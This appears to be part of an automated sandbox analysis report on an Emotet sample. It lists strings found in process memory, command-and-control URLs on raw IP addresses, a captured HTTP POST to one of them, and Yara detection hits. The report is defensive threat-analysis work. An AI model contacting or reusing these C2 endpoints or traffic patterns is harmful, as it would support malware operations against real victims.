"content.isMain\":false,\"content.packageId\":\"828B5831.HiddenCityMysteryofShadows_1.39.3900.70_neutral_~_ytsefhwckbdv6\",\"content.productId\":\"94ad5279-e84a-4d40-b7cf-c6f16f916e6c\",\"content.targetPlatforms\":[{\"platf
                      Source: svchost.exe, 00000014.00000003.392907537.000002847D7BC000.00000004.00000001.sdmpString found in binary or memory: % Regular free updates with loads of new content\r\n____________________________ \r\n\r\nGame available in: English, French, Italian, German, Spanish, Portuguese, Brazilian Portuguese, Russian, Korean, Simplified Chinese, Traditional Chinese, Japanese, Arabic\r\n____________________________ \r\n\r\nSign up now for a weekly round-up of the best from G5 Games! www.g5e.com/e-mail\r\n____________________________ \r\n\r\nG5 Games - World of Adventures"!!\r\nCollect them all! Search for \"g5\" in Windows Store! \r\n____________________________\r\n\r\nVISIT US: www.g5e.com\r\nWATCH US: www.youtube.com/g5enter\r\nFIND US: www.facebook.com/HiddenCityGame\r\nJOIN US: https://instagram.com/hiddencity_\r\nFOLLOW US: www.twitter.com/g5games\r\nTerms of Service: http://www.g5e.com/termsofservice \r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detective manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle game journey ","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductGame;1","ProductId":"9NBLGGH6J6VK","Properties":{"PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","PackageIdentityName
                      Source: svchost.exe, 00000014.00000003.392907537.000002847D7BC000.00000004.00000001.sdmpString found in binary or memory: % Regular free updates with loads of new content\r\n____________________________ \r\n\r\nGame available in: English, French, Italian, German, Spanish, Portuguese, Brazilian Portuguese, Russian, Korean, Simplified Chinese, Traditional Chinese, Japanese, Arabic\r\n____________________________ \r\n\r\nSign up now for a weekly round-up of the best from G5 Games! www.g5e.com/e-mail\r\n____________________________ \r\n\r\nG5 Games - World of Adventures"!!\r\nCollect them all! Search for \"g5\" in Windows Store! \r\n____________________________\r\n\r\nVISIT US: www.g5e.com\r\nWATCH US: www.youtube.com/g5enter\r\nFIND US: www.facebook.com/HiddenCityGame\r\nJOIN US: https://instagram.com/hiddencity_\r\nFOLLOW US: www.twitter.com/g5games\r\nTerms of Service: http://www.g5e.com/termsofservice \r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detective manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle game journey ","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductGame;1","ProductId":"9NBLGGH6J6VK","Properties":{"PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","PackageIdentityName
                      Source: svchost.exe, 00000014.00000003.392907537.000002847D7BC000.00000004.00000001.sdmpString found in binary or memory: % Regular free updates with loads of new content\r\n____________________________ \r\n\r\nGame available in: English, French, Italian, German, Spanish, Portuguese, Brazilian Portuguese, Russian, Korean, Simplified Chinese, Traditional Chinese, Japanese, Arabic\r\n____________________________ \r\n\r\nSign up now for a weekly round-up of the best from G5 Games! www.g5e.com/e-mail\r\n____________________________ \r\n\r\nG5 Games - World of Adventures"!!\r\nCollect them all! Search for \"g5\" in Windows Store! \r\n____________________________\r\n\r\nVISIT US: www.g5e.com\r\nWATCH US: www.youtube.com/g5enter\r\nFIND US: www.facebook.com/HiddenCityGame\r\nJOIN US: https://instagram.com/hiddencity_\r\nFOLLOW US: www.twitter.com/g5games\r\nTerms of Service: http://www.g5e.com/termsofservice \r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detective manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle game journey ","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductGame;1","ProductId":"9NBLGGH6J6VK","Properties":{"PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","PackageIdentityName
                      Source: unknownHTTP traffic detected: POST /bU1xHhP1i5jVxZu/xvoUent/AXIzcbqj58Yqx42hBt/dnHR1wy6s3G/hhZqlzS/iQ7q56sdJjtJs1gO/ HTTP/1.1Referer: http://87.106.139.101/bU1xHhP1i5jVxZu/xvoUent/AXIzcbqj58Yqx42hBt/dnHR1wy6s3G/hhZqlzS/iQ7q56sdJjtJs1gO/Content-Type: multipart/form-data; boundary=---------------------------270479976396707User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 87.106.139.101:8080Content-Length: 4596Connection: Keep-AliveCache-Control: no-cache
                      Source: KBDHEB.exe, 00000002.00000002.410251484.0000000002396000.00000004.00000001.sdmpString found in binary or memory: http://190.144.18.198/7I6ErDP3TXIbpPVjGt/
                      Source: KBDHEB.exe, 00000002.00000002.410251484.0000000002396000.00000004.00000001.sdmpString found in binary or memory: http://190.144.18.198/7I6ErDP3TXIbpPVjGt/oM
                      Source: KBDHEB.exe, 00000002.00000002.410810736.0000000002980000.00000004.00000001.sdmpString found in binary or memory: http://79.143.178.194:8080/OBOuz0RiXji/d5wQYa4TTiE8mhM/tWmQkXn/eT4anGr2w20EB/5Z2vttar3W/LDWHDNq9fsv2
                      Source: KBDHEB.exe, 00000002.00000002.410810736.0000000002980000.00000004.00000001.sdmpString found in binary or memory: http://87.106.136.232:8080/tykkNBM8k7Mh3VVh/JyRkf2GiuhU/36unp6rB6/
                      Source: KBDHEB.exe, 00000002.00000002.410810736.0000000002980000.00000004.00000001.sdmpString found in binary or memory: http://87.106.136.232:8080/tykkNBM8k7Mh3VVh/JyRkf2GiuhU/36unp6rB6/e
                      Source: KBDHEB.exe, 00000002.00000002.410810736.0000000002980000.00000004.00000001.sdmpString found in binary or memory: http://87.106.136.232:8080/tykkNBM8k7Mh3VVh/JyRkf2GiuhU/36unp6rB6/l
                      Source: KBDHEB.exe, 00000002.00000002.410810736.0000000002980000.00000004.00000001.sdmpString found in binary or memory: http://87.106.136.232:8080/tykkNBM8k7Mh3VVh/JyRkf2GiuhU/36unp6rB6/u
                      Source: KBDHEB.exe, 00000002.00000002.410810736.0000000002980000.00000004.00000001.sdmpString found in binary or memory: http://87.106.139.101:8080/LrBFYD0XkeH6Uxd/HqBc9ORyzrNJU/Ah5wivG5/fOm2sJDdlpsjYC5CZe/_o
                      Source: KBDHEB.exe, 00000002.00000002.410810736.0000000002980000.00000004.00000001.sdmpString found in binary or memory: http://87.106.139.101:8080/bU1xHhP1i5jVxZu/xvoUent/AXIzcbqj58Yqx42hBt/dnHR1wy6s3G/hhZqlzS/iQ7q56sdJj
                      Source: KBDHEB.exe, 00000002.00000002.410810736.0000000002980000.00000004.00000001.sdmpString found in binary or memory: http://87.10A
                      Source: KBDHEB.exe, 00000002.00000002.410810736.0000000002980000.00000004.00000001.sdmpString found in binary or memory: http://87.10AA
                      Source: svchost.exe, 00000014.00000002.413733181.000002847D5F0000.00000004.00000001.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
                      Source: svchost.exe, 00000014.00000002.413733181.000002847D5F0000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
                      Source: svchost.exe, 00000014.00000002.413733181.000002847D5F0000.00000004.00000001.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
                      Source: svchost.exe, 00000014.00000002.413733181.000002847D5F0000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0
                      Source: svchost.exe, 00000009.00000002.306308761.000001BC4BC13000.00000004.00000001.sdmpString found in binary or memory: http://www.bingmapsportal.com
                      Source: svchost.exe, 00000014.00000003.392756849.000002847D75D000.00000004.00000001.sdmp, svchost.exe, 00000014.00000003.392907537.000002847D7BC000.00000004.00000001.sdmp, svchost.exe, 00000014.00000003.392873654.000002847D77F000.00000004.00000001.sdmpString found in binary or memory: http://www.g5e.com/G5_End_User_License_Supplemental_Terms
                      Source: svchost.exe, 00000014.00000003.392756849.000002847D75D000.00000004.00000001.sdmp, svchost.exe, 00000014.00000003.392907537.000002847D7BC000.00000004.00000001.sdmp, svchost.exe, 00000014.00000003.392873654.000002847D77F000.00000004.00000001.sdmpString found in binary or memory: http://www.g5e.com/termsofservice
                      Source: svchost.exe, 00000014.00000003.391438598.000002847D759000.00000004.00000001.sdmpString found in binary or memory: http://www.hulu.com/privacy
                      Source: svchost.exe, 00000014.00000003.391438598.000002847D759000.00000004.00000001.sdmpString found in binary or memory: http://www.hulu.com/terms
                      Source: svchost.exe, 00000009.00000003.305880511.000001BC4BC61000.00000004.00000001.sdmpString found in binary or memory: https://appexmapsappupdate.blob.core.windows.net
                      Source: svchost.exe, 00000014.00000003.399566749.000002847D78E000.00000004.00000001.sdmp, svchost.exe, 00000014.00000003.399526932.000002847D772000.00000004.00000001.sdmpString found in binary or memory: https://corp.roblox.com/contact/
                      Source: svchost.exe, 00000014.00000003.399566749.000002847D78E000.00000004.00000001.sdmp, svchost.exe, 00000014.00000003.399526932.000002847D772000.00000004.00000001.sdmp, svchost.exe, 00000014.00000003.399513122.000002847D761000.00000004.00000001.sdmpString found in binary or memory: https://corp.roblox.com/parents/
                      Source: svchost.exe, 00000009.00000003.305925778.000001BC4BC5A000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Imagery/Copyright/
                      Source: svchost.exe, 00000009.00000002.306397657.000001BC4BC5C000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/
                      Source: svchost.exe, 00000009.00000003.305880511.000001BC4BC61000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Locations
                      Source: svchost.exe, 00000009.00000002.306367566.000001BC4BC3C000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Routes/
                      Source: svchost.exe, 00000009.00000002.306397657.000001BC4BC5C000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Traffic/Incidents/
                      Source: svchost.exe, 00000009.00000003.305880511.000001BC4BC61000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/mapcontrol/logging.ashx
                      Source: svchost.exe, 00000009.00000003.305911439.000001BC4BC47000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v=
                      Source: svchost.exe, 00000009.00000002.306397657.000001BC4BC5C000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/JsonFilter/VenueMaps/data/
                      Source: svchost.exe, 00000009.00000003.305880511.000001BC4BC61000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Locations
                      Source: svchost.exe, 00000009.00000002.306367566.000001BC4BC3C000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/
                      Source: svchost.exe, 00000009.00000003.305880511.000001BC4BC61000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Driving
                      Source: svchost.exe, 00000009.00000003.305880511.000001BC4BC61000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Transit
                      Source: svchost.exe, 00000009.00000003.305880511.000001BC4BC61000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Walking
                      Source: svchost.exe, 00000009.00000003.305999257.000001BC4BC41000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Schedules/
                      Source: svchost.exe, 00000009.00000003.305999257.000001BC4BC41000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=
                      Source: svchost.exe, 00000009.00000003.305880511.000001BC4BC61000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/mapcontrol/logging.ashx
                      Source: svchost.exe, 00000009.00000002.306397657.000001BC4BC5C000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
                      Source: svchost.exe, 00000009.00000003.305925778.000001BC4BC5A000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
                      Source: svchost.exe, 00000009.00000002.306397657.000001BC4BC5C000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
                      Source: svchost.exe, 00000009.00000002.306397657.000001BC4BC5C000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
                      Source: svchost.exe, 00000009.00000002.306408621.000001BC4BC62000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.t
                      Source: svchost.exe, 00000009.00000003.305880511.000001BC4BC61000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
                      Source: svchost.exe, 00000009.00000002.306367566.000001BC4BC3C000.00000004.00000001.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
                      Source: svchost.exe, 00000009.00000003.283903786.000001BC4BC31000.00000004.00000001.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=
                      Source: svchost.exe, 00000014.00000003.399566749.000002847D78E000.00000004.00000001.sdmp, svchost.exe, 00000014.00000003.399526932.000002847D772000.00000004.00000001.sdmpString found in binary or memory: https://en.help.roblox.com/hc/en-us
                      Source: svchost.exe, 00000014.00000003.392756849.000002847D75D000.00000004.00000001.sdmp, svchost.exe, 00000014.00000003.392907537.000002847D7BC000.00000004.00000001.sdmp, svchost.exe, 00000014.00000003.392873654.000002847D77F000.00000004.00000001.sdmpString found in binary or memory: https://instagram.com/hiddencity_
                      Source: svchost.exe, 00000009.00000002.306367566.000001BC4BC3C000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
                      Source: svchost.exe, 00000009.00000002.306367566.000001BC4BC3C000.00000004.00000001.sdmp, svchost.exe, 00000009.00000002.306308761.000001BC4BC13000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
                      Source: svchost.exe, 00000009.00000003.283903786.000001BC4BC31000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
                      Source: svchost.exe, 00000009.00000003.305990184.000001BC4BC56000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=
                      Source: svchost.exe, 00000009.00000003.283903786.000001BC4BC31000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
                      Source: svchost.exe, 00000009.00000003.283903786.000001BC4BC31000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
                      Source: svchost.exe, 00000009.00000003.305999257.000001BC4BC41000.00000004.00000001.sdmpString found in binary or memory: https://t0.tiles.ditu.live.com/tiles/gen19
                      Source: svchost.exe, 00000014.00000003.391438598.000002847D759000.00000004.00000001.sdmpString found in binary or memory: https://www.hulu.com/ca-privacy-rights
                      Source: svchost.exe, 00000014.00000003.391438598.000002847D759000.00000004.00000001.sdmpString found in binary or memory: https://www.hulu.com/do-not-sell-my-info
                      Source: svchost.exe, 00000014.00000003.399566749.000002847D78E000.00000004.00000001.sdmp, svchost.exe, 00000014.00000003.399526932.000002847D772000.00000004.00000001.sdmpString found in binary or memory: https://www.roblox.com/develop
                      Source: svchost.exe, 00000014.00000003.399566749.000002847D78E000.00000004.00000001.sdmp, svchost.exe, 00000014.00000003.399526932.000002847D772000.00000004.00000001.sdmpString found in binary or memory: https://www.roblox.com/info/privacy
                      Source: tokenbinding2.exe, 00000016.00000002.413591268.00000000010FA000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
                      Source: C:\Users\user\Desktop\MV9tCJw8Xr.exeCode function: 1_2_00409E4C GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA,
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\KBDHEB.exeCode function: 2_2_00409E4C GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA,

                      E-Banking Fraud:

                      barindex
                      Yara detected EmotetShow sources
                      Source: Yara matchFile source: 0000001C.00000002.442107298.0000000002E30000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001F.00000002.464467088.0000000002971000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001A.00000002.428286473.0000000000401000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001B.00000002.439198093.00000000030A4000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000017.00000002.419691301.0000000002B60000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001E.00000002.447921757.0000000000401000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.409946208.00000000020C4000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000020.00000002.468787553.00000000029E4000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000002.470554430.0000000000401000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000025.00000002.493970869.0000000002AE0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001D.00000002.446724023.0000000003274000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000024.00000002.482749716.00000000025B0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000024.00000002.483313060.0000000002671000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001C.00000002.439928850.0000000000401000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000020.00000002.468454177.0000000002980000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001B.00000002.433437120.0000000000401000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000016.00000002.413932910.0000000002EB0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001B.00000002.438746003.0000000001350000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001E.00000002.449294722.0000000001310000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000024.00000002.483058248.0000000002614000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001F.00000002.463773326.00000000028B0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.243322939.00000000021E1000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.409716178.00000000005B0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001A.00000002.429639515.0000000002CD4000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001D.00000002.446019093.0000000001850000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000016.00000002.414052123.0000000002F14000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000002.477958707.00000000031B0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000025.00000002.492699981.0000000000401000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000017.00000002.417949677.0000000000401000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.410029176.00000000021D1000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001A.00000002.429459440.0000000002C70000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000020.00000002.465519796.0000000000401000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001F.00000002.464108385.0000000002914000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.243267422.0000000002180000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.243296865.00000000021C4000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001E.00000002.449645390.0000000002D64000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001C.00000002.442504698.0000000002E94000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001D.00000002.443777034.0000000000401000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000002.478389759.0000000003214000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000017.00000002.420026339.0000000002BC4000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000025.00000002.494214004.0000000002B44000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000016.00000002.412800025.0000000000401000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 32.2.jscript9.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.KBDHEB.exe.5b053f.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 30.2.msrd2x40.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 22.2.tokenbinding2.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 37.2.catsrvut.exe.2ae279e.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 29.2.KBDINTAM.exe.185279e.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 31.2.MCCSEngineShared.exe.28b279e.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 27.2.COLORCNV.exe.135052e.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 31.2.MCCSEngineShared.exe.28b279e.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 36.2.msvcr100_clr0400.exe.25b279e.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 23.2.KBDHEB.exe.2b6279e.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 29.2.KBDINTAM.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 22.2.tokenbinding2.exe.2eb279e.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 23.2.KBDHEB.exe.2b6052e.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 30.2.msrd2x40.exe.131052e.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 26.2.execmodelproxy.exe.2c7052e.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 34.2.wmvdspa.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 34.2.wmvdspa.exe.31b052e.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.MV9tCJw8Xr.exe.218053f.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 36.2.msvcr100_clr0400.exe.2670000.3.unpack, type: UNPACKEDPE
